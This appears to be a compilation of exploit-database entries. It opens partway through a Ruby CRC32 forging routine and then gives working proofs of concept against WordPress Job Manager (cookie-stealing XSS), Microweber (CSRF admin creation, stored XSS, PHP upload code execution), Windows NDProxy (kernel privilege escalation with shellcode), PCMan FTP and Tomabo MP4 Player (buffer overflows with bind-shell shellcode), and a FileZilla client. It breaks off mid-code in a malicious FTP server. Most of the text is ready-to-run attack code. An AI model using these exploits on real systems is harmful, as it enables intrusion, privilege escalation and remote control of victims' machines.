0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449,
0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618,
0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E,
0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55,
0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3,
0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7,
0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71,
0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA,
0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C,
0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D,
0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB,
0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820,
0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6,
0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68,
0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE,
0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725,
0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3,
0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2,
0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574,
0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF,
0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839,
0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D,
0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B,
0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450,
0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6,
0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387,
0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601,
0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA,
0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C,
0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717,
0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291,
0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A,
0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC,
0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D,
0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B,
0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0,
0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546,
0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462,
0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4,
0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F,
0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9,
0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8,
0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E,
0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5,
0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633,
0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD,
0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B,
0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0,
0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936,
0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67,
0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1,
0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A,
0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC,
0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288,
0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E,
0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5,
0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43,
0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812,
0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
]
# forward calculation of CRC up to pos, sets current forward CRC state
fwd_crc = 0xffffffff
data.each_byte do |c|
fwd_crc = (fwd_crc >> 8) ^ Zlib.crc_table[(fwd_crc ^ c) & 0xff]
end
# backward calculation of CRC up to pos, sets wanted backward CRC state
bkd_crc = wanted_crc ^ 0xffffffff
# deduce the 4 bytes we need to insert
[fwd_crc].pack('<L').each_byte.reverse_each do |c|
bkd_crc = ((bkd_crc << 8) & 0xffffffff) ^ crc32_reverse[bkd_crc >> 24] ^ c
end
res = data + [bkd_crc].pack('<L')
res
end
end
Job Manager Persistent XSS
Details
========================================================================================
Product: Job Manager Plugin For Wordpress
Vendor-URL: www.wp-jobmanager.com
CVE-ID: CVE-2015-2321
Credits
========================================================================================
Discovered by: Owais Mehtab
Affected Products:
========================================================================================
Job Manager Plugin <= 0.7.22
Description
========================================================================================
"Job Manager Plugin For Wordpress"
More Details
========================================================================================
A persistent Cross site scripting (XSS) in Job Manager Plugin has been discovered,
the plugin's email field was not sanitized thus the vulnerability can be easily
exploited and can be used to steal cookies,perform phishing attacks and other various
attacks compromising the security of a user.
Proof of Concept
========================================================================================
Click on the "send through your résume" and set the below vector in email field
'"><img src=x onerror=prompt(document.cookie);>
Now click on initiate chat
PoC Video
https://www.dropbox.com/s/i8cuf15hbdf5tmu/jobmanager-xss.mp4
<!DOCTYPE html>
<!--
Microweber v1.0.3 Stored XSS And CSRF Add Admin Exploit
Vendor: Microweber Team
Product web page: http://www.microweber.com
Affected version: 1.0.3
Summary: Microweber is an open source drag and drop
PHP/Laravel CMS licensed under Apache License, Version
2.0 which allows you to create your own website, blog
or online shop.
Desc: The application allows users to perform certain
actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges
if a logged-in user visits a malicious web site. Stored
cross-site scripting vulnerabilitity is also discovered.
The issue is triggered when input passed via the POST
parameter 'option_value' is not properly sanitized before
being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session
in context of an affected site.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5249
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5249.php
12.07.2015
-->
<html>
<title>Microweber v1.0.3 Stored XSS And CSRF Add Admin Exploit</title>
<br /><br />
<body><center>
<form action="http://localhost/microweber-latest/api/save_user" method="POST">
<input type="hidden" name="id" value="0" />
<input type="hidden" name="thumbnail" value="" />
<input type="hidden" name="username" value="Freakazoid" />
<input type="hidden" name="password" value="00110001" />
<input type="hidden" name="email" value="lab@zeroscience.mk" />
<input type="hidden" name="first_name" value="Joe" />
<input type="hidden" name="last_name" value="Black" />
<input type="hidden" name="is_active" value="1" />
<input type="hidden" name="is_admin" value="1" />
<input type="hidden" name="basic_mode" value="0" />
<input type="hidden" name="api_key" value="" />
<input type="submit" value="CSRF Adminize" />
</form>
</body>
</html>
<br /><br />
<html>
<body>
<form action="http://localhost/microweber-latest/api/save_option" method="POST">
<input type="hidden" name="option_key" value="website_keywords" />
<input type="hidden" name="option_group" value="website" />
<input type="hidden" name="option_value" value='"><img src=j onerror=confirm("ZSL")>' />
<input type="submit" value="Store XSS" />
</form></center>
</body>
</html>
/*
################################################################
# Exploit Title: Windows NDProxy Privilege Escalation (MS14-002)
# Date: 2015-08-03
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP SP2 x86-64
# Windows 2003 SP2 x86
# Windows 2003 SP2 x86-64
# Windows 2003 SP2 IA-64
# Supported vulnerable software:
# Windows XP SP3 x86
# Windows 2003 SP2 x86
# Tested on:
# Windows XP SP3 x86 EN
# Windows 2003 SP2 x86 EN
# CVE ID: 2013-5065
################################################################
# Vulnerability description:
# NDPROXY is a system-provided driver that interfaces WAN
# miniport drivers, call managers, and miniport call managers
# to the Telephony Application Programming Interfaces (TAPI)
# services.
# The vulnerability is caused when the NDProxy.sys kernel
# component fails to properly validate input.
# An attacker who successfully exploited this vulnerability
# could run arbitrary code in kernel mode (i.e. with SYSTEM
# privileges).
################################################################
# Exploit notes:
# Privileged shell execution:
# - the SYSTEM shell will spawn within the existing shell
# (i.e. exploit usable via a remote shell)
# Exploit compiling:
# - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe
# Exploit prerequisites:
# - low privilege access to the target (remote shell or RDP)
# - target not patched (KB2914368 not installed)
# - service "Routing and Remote Access" running on the target
# - "Power User" user group can start and stop services
# - > sc query remoteaccess
# - > sc start remoteaccess
################################################################
# Thanks to:
# Andy (C PoC - Win XP SP3)
# ryujin (Python PoC - Win XP SP3)
################################################################
# References:
# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065
# https://technet.microsoft.com/en-us/library/security/ms14-002.aspx
# https://penturalabs.wordpress.com/2013/12/11/ndproxy-privilege-escalation-cve-2013-5065/
# https://www.exploit-db.com/exploits/30014/
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363216%28v=vs.85%29.aspx
################################################################
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
typedef struct {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef DWORD NTSTATUS;
NTSTATUS (WINAPI *_NtQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
static VOID InitFirstPage (void)
{
PVOID BaseAddress;
ULONG RegionSize;
NTSTATUS ReturnCode;
FARPROC NtAllocateVirtualMemory;
NtAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "NtAllocateVirtualMemory");
fprintf (stderr, "[+] NtAllocateVirtualMemory@%p\n", NtAllocateVirtualMemory);
RegionSize = 0xf000;
BaseAddress = (PVOID) 0x00000001;
ReturnCode = NtAllocateVirtualMemory (GetCurrentProcess (),
&BaseAddress,
0,
&RegionSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (ReturnCode != 0)
{
fprintf (stderr, "[-] NtAllocateVirtualMemory() failed to map first page\n");
fprintf (stderr, " Error code: %#X\n", ReturnCode);
fflush (stderr);
ExitProcess (1);
}
fprintf (stderr, "[+] BaseAddress: %p, RegionSize: %#x\n", BaseAddress, RegionSize), fflush (stderr);
FillMemory (BaseAddress, RegionSize, 0x41);
return;
}
int exploit (unsigned char *shellcode)
{
DWORD writtenBytes;
int returnValue;
InitFirstPage ();
unsigned char *shellcodeBuffer;
shellcodeBuffer = (char *) malloc (400);
memset (shellcodeBuffer, (int) "xCC", 400);
memcpy (shellcodeBuffer, shellcode, 112);
returnValue = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x00000001, shellcodeBuffer, 0x400, &writtenBytes);
if (returnValue == 0)
{
printf ("[-] Attempt to map memory_write failed\n");
printf (" Error code: %d\n", GetLastError ());
exit(1);
}
HANDLE ndProxyDeviceHandle = CreateFileA ("\\\\.\\NDProxy", 0, 0, NULL, OPEN_EXISTING, 0, NULL);
if (ndProxyDeviceHandle == INVALID_HANDLE_VALUE)
{
printf ("[-] Creating a device handle on NDProxy failed\n");
printf (" Error code: %d\n", GetLastError());
exit (0);
}
DWORD inputBuffer [0x15] = {0};
DWORD returnedBytes = 0;
*(inputBuffer + 5) = 0x7030125;
*(inputBuffer + 7) = 0x34;
DeviceIoControl (ndProxyDeviceHandle, 0x8fff23cc, inputBuffer, 0x54, inputBuffer, 0x24, &returnedBytes, 0);
CloseHandle (ndProxyDeviceHandle);
system ("cmd.exe /T:C0 /K cd c:\\windows\\system32");
return 0;
}
int main (int argc, char **argv)
{
if (argc != 2)
{
printf ("[*] Usage: %s OS_TYPE\n", argv[0]);
printf (" supported OS_TYPE:\n");
printf (" XP - Windows XP SP3 x86\n");
printf (" 2k3 - Windows 2003 SP2 x86\n");
printf ("[*] Note: the service \"Routing and Remote Access\"\n");
printf (" must be running on the target machine\n");
exit (0);
}
else
{
if ((strcmp (argv[1], "xp") == 0) || (strcmp (argv[1], "XP") == 0))
{
unsigned char shellcodeXP[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B"
"\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00"
"\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3";
exploit (shellcodeXP);
}
else if ((strcmp (argv[1], "2k3") == 0) || (strcmp (argv[1], "2K3") == 0))
{
unsigned char shellcode2k3[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B"
"\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00"
"\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3";
exploit (shellcode2k3);
}
else
{
printf ("[-] Invalid argument\n");
printf (" Argument used: %s\n", argv[1]);
exit(0);
}
}
}
#!/usr/bin/python
# title: PCMan FTP Server v2.0.7 Buffer Overflow - PUT Command
# author: @shipcod3 (Jay Turla)
# nc <host> 9988
# Tested on Windows XP Service Pack 3 - English
# description: Buffer overflow is triggered upon sending long string using the command PUT to PCMAN FTP 2.07
import socket
import sys
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c
shellcode = (
"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92")
buffer = "\x90" * 30 + shellcode
#77c35459 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll]
evil = "A"*2008 + "\x59\x54\xC3\x77" + buffer + "C"*(888-len(buffer))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((raw_input('Enter Host:'),21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('PUT ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close
Microweber v1.0.3 File Upload Filter Bypass Remote PHP Code Execution
Vendor: Microweber Team
Product web page: http://www.microweber.com
Affected version: 1.0.3
Summary: Microweber is an open source drag and drop PHP/Laravel CMS licensed
under Apache License, Version 2.0 which allows you to create your own website,
blog or online shop.
Desc: Microweber suffers from an authenticated arbitrary command execution
vulnerability. The issue is caused due to the improper verification when
uploading files in '/src/Microweber/functions/plupload.php' script. This
can be exploited to execute arbitrary PHP code by bypassing the extension
restriction by putting the dot character at the end of the filename and uploading
a malicious PHP script file that will be stored in '/userfiles/media/localhost/uploaded'
directory.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5250
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5250.php
12.07.2015
--
PoC Requests:
-------------
1.
POST /microweber-latest/plupload?token=1111111111222222222233333333334444444444&path=media%25255Clocalhost%25255C&path=media%255Clocalhost%255Cuploaded%255C HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 319
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqX83MP6Cg5JpA193
Accept: */*
Referer: http://localhost/microweber-latest/editor_tools/plupload?type=explorer&filters=*&multiple=true&autostart=undefined&mwv=1.0.3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: mwui=%7B%22%23modules-and-layouts%2C%23tab_modules%2C.tst-modules%22%3A%22true%22%7D; recommend=%7B%22logo%22%3A1%7D; back_to_admin=http%3A//localhost/microweber-latest/admin/view%3Amodules/load_module%3Afiles%23path%3Dmedia%255Clocalhost%255Cuploaded%255C%26select-file%3Dhttp%3A//localhost/microweber-latest/userfiles/media/localhost/uploaded/phpinfo.php; laravel_session=eyJpdiI6ImNYNnkyWjJkOXZyTVRDMXlcL0pKQzBRPT0iLCJ2YWx1ZSI6Ilp6QjhDYjRRMEY4NGR5RzVuZGNxSnd1V3dGQ1R6OVdaWjZrZStiT1Q2bVM3UmRoQjNrak1ORzV5bXZjbzVDSitqdVVkdzdqOFVQa2hZdWRwMlwvMSttZz09IiwibWFjIjoiNGQxYzkwOTk4YmIzNTgzNWRiZmZlOTM4N2I2MzA1NjIzODcwNWRmMWM5ZDcwN2YxMGJlZmQ2ZjUxYmMzNjVjOSJ9
------WebKitFormBoundaryqX83MP6Cg5JpA193
Content-Disposition: form-data; name="name"
phpinfo.php.
------WebKitFormBoundaryqX83MP6Cg5JpA193
Content-Disposition: form-data; name="file"; filename="phpinfo.php."
Content-Type: application/octet-stream
<?php
phpinfo();
?>
------WebKitFormBoundaryqX83MP6Cg5JpA193--
2.
GET http://localhost/microweber-latest/userfiles/media/localhost/uploaded/phpinfo.php HTTP/1.1
#!/usr/bin/python
# Exploit Title: Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow
# Date: 03/08/2015
# Exploit Author: Saeid Atabaki
# E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org
# Linkedin: https://www.linkedin.com/in/saeidatabaki
# Vendor Homepage: http://tomabo.com/mp4-player/index.html
# Version: 3.11.3
# Tested on: Windows XP SP3
#---------------------------------------------------------------------#
# Badchars: "\x00\x0a\x0d\x0c\x20\x09\x1a"'
#
# nc 192.168.11.136 8080
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator\Desktop>
#---------------------------------------------------------------------#
import sys, struct
file="crash.m3u"
# Windows bind shell port 8080, feel free to swap shellcode
sc = ""
sc += "\xdd\xc1\xd9\x74\x24\xf4\xb8\xd3\x4b\xb2\xa4\x5d\x31"
sc += "\xc9\xb1\x53\x31\x45\x17\x83\xc5\x04\x03\x96\x58\x50"
sc += "\x51\xe4\xb7\x16\x9a\x14\x48\x77\x12\xf1\x79\xb7\x40"
sc += "\x72\x29\x07\x02\xd6\xc6\xec\x46\xc2\x5d\x80\x4e\xe5"
sc += "\xd6\x2f\xa9\xc8\xe7\x1c\x89\x4b\x64\x5f\xde\xab\x55"
sc += "\x90\x13\xaa\x92\xcd\xde\xfe\x4b\x99\x4d\xee\xf8\xd7"
sc += "\x4d\x85\xb3\xf6\xd5\x7a\x03\xf8\xf4\x2d\x1f\xa3\xd6"
sc += "\xcc\xcc\xdf\x5e\xd6\x11\xe5\x29\x6d\xe1\x91\xab\xa7"
sc += "\x3b\x59\x07\x86\xf3\xa8\x59\xcf\x34\x53\x2c\x39\x47"
sc += "\xee\x37\xfe\x35\x34\xbd\xe4\x9e\xbf\x65\xc0\x1f\x13"
sc += "\xf3\x83\x2c\xd8\x77\xcb\x30\xdf\x54\x60\x4c\x54\x5b"
sc += "\xa6\xc4\x2e\x78\x62\x8c\xf5\xe1\x33\x68\x5b\x1d\x23"
sc += "\xd3\x04\xbb\x28\xfe\x51\xb6\x73\x97\x96\xfb\x8b\x67"
sc += "\xb1\x8c\xf8\x55\x1e\x27\x96\xd5\xd7\xe1\x61\x19\xc2"
sc += "\x56\xfd\xe4\xed\xa6\xd4\x22\xb9\xf6\x4e\x82\xc2\x9c"
sc += "\x8e\x2b\x17\x08\x86\x8a\xc8\x2f\x6b\x6c\xb9\xef\xc3"
sc += "\x05\xd3\xff\x3c\x35\xdc\xd5\x55\xde\x21\xd6\x46\x8f"
sc += "\xaf\x30\x12\xbf\xf9\xeb\x8a\x7d\xde\x23\x2d\x7d\x34"
sc += "\x1c\xd9\x36\x5e\x9b\xe6\xc6\x74\x8b\x70\x4d\x9b\x0f"
sc += "\x61\x52\xb6\x27\xf6\xc5\x4c\xa6\xb5\x74\x50\xe3\x2d"
sc += "\x14\xc3\x68\xad\x53\xf8\x26\xfa\x34\xce\x3e\x6e\xa9"
sc += "\x69\xe9\x8c\x30\xef\xd2\x14\xef\xcc\xdd\x95\x62\x68"
sc += "\xfa\x85\xba\x71\x46\xf1\x12\x24\x10\xaf\xd4\x9e\xd2"
sc += "\x19\x8f\x4d\xbd\xcd\x56\xbe\x7e\x8b\x56\xeb\x08\x73"
sc += "\xe6\x42\x4d\x8c\xc7\x02\x59\xf5\x35\xb3\xa6\x2c\xfe"
sc += "\xc3\xec\x6c\x57\x4c\xa9\xe5\xe5\x11\x4a\xd0\x2a\x2c"
sc += "\xc9\xd0\xd2\xcb\xd1\x91\xd7\x90\x55\x4a\xaa\x89\x33"
sc += "\x6c\x19\xa9\x11"
payload = "\x90" * 1028 + "\xeb\x18\x90\x90" + "\x69\x9e\x48\x00" + "\x90" * 20 + sc
writeFile = open (file, "w")
writeFile.write( payload )
writeFile.close()
# Exploit Title: Filezilla client 2.2.X SEH buffer overflow exploit
# Date: 02/08/2015
# Exploit Author: ly0n
# Vendor Homepage: filezilla-project.org/
# Software Link: http://www.oldapps.com/filezilla.php?app=7cdf14e88e9dfa85fb661c1c6e649e90
# Version: tested on filezilla 2.2.21
# Tested on: Windows XP sp3 english
#!/usr/bin/env python2
# coding: utf-8
import os,socket,threading,time
#import traceback
# visit: ly0n.me
# greetz: NBS
#MSGBOX "BrokenByte"
msgbox = ("\x68\x6e\x33\x72\x00\x68\x75\x74"
"\x69\x30\x68\x5e\x58\x65\x63\x89"
"\xe3\x68\x20\x20\x20\x00\x68\x68"
"\x65\x72\x65\x68\x77\x61\x73\x20"
"\x68\x6e\x33\x72\x20\x68\x75\x74"
"\x69\x30\x68\x5e\x58\x65\x63\x89"
"\xe1\x31\xc0\x50\x53\x51\x50\x50"
"\xbe\xea\x07\x45\x7e\xff\xe6\x31"
"\xc0\x50\xb8\x12\xcb\x81\x7c\xff"
"\xe0")
nops = "\x90" * 100
#77EA9CAC POP POP RET kernel32.dll <- seh
#EB069090 SHORT JUMP 6 POS + 2 NOPS <- nseh
nseh = "\xeb\x06\x90\x90"
seh = "\xAC\x9C\xEA\x77"
allow_delete = False
local_ip = "192.168.11.6" #SERVER LOCAL IP
local_port = 21 #DESIRED PORT
buffer1 = "\x41" * 1896 + nseh + seh + nops + msgbox + nops
buffer = buffer1 + ".txt"
currdir=os.path.abspath('.')
class FTPserverThread(threading.Thread):
def __init__(self,(conn,addr)):
self.conn=conn
self.addr=addr
self.basewd=currdir
self.cwd=self.basewd
self.rest=False
self.pasv_mode=False
threading.Thread.__init__(self)
def run(self):
self.conn.send('220 Welcome!\r\n')
while True:
cmd=self.conn.recv(256)
if not cmd: break
else:
print 'Recieved:',cmd
try:
func=getattr(self,cmd[:4].strip().upper())
func(cmd)
except Exception,e:
print 'ERROR:',e
#traceback.print_exc()
self.conn.send('500 Sorry.\r\n')
def SYST(self,cmd):
self.conn.send('215 UNIX Type: L8\r\n')
def OPTS(self,cmd):
if cmd[5:-2].upper()=='UTF8 ON':
self.conn.send('200 OK.\r\n')
else:
self.conn.send('451 Sorry.\r\n')
def USER(self,cmd):
self.conn.send('331 OK.\r\n')
def PASS(self,cmd):
self.conn.send('230 OK.\r\n')
#self.conn.send('530 Incorrect.\r\n')
def QUIT(self,cmd):
self.conn.send('221 Goodbye.\r\n')
def NOOP(self,cmd):
self.conn.send('200 OK.\r\n')
def TYPE(self,cmd):
self.mode=cmd[5]
self.conn.send('200 Binary mode.\r\n')
def CDUP(self,cmd):
if not os.path.samefile(self.cwd,self.basewd):
#learn from stackoverflow
self.cwd=os.path.abspath(os.path.join(self.cwd,'..'))
self.conn.send('200 OK.\r\n')
def PWD(self,cmd):
cwd=os.path.relpath(self.cwd,self.basewd)
if cwd=='.':
cwd='/'
else:
cwd='/'+cwd
self.conn.send('257 \"%s\"\r\n' % cwd)
def CWD(self,cmd):
chwd=cmd[4:-2]
if chwd=='/':
self.cwd=self.basewd
elif chwd[0]=='/':
self.cwd=os.path.join(self.basewd,chwd[1:])
else:
self.cwd=os.path.join(self.cwd,chwd)
self.conn.send('250 OK.\r\n')
def PORT(self,cmd):
if self.pasv_mode:
self.servsock.close()
self.pasv_mode = False
l=cmd[5:].split(',')
self.dataAddr='.'.join(l[:4])
self.dataPort=(int(l[4])<<8)+int(l[5])
self.conn.send('200 Get port.\r\n')
def PASV(self,cmd): # from http://goo.gl/3if2U
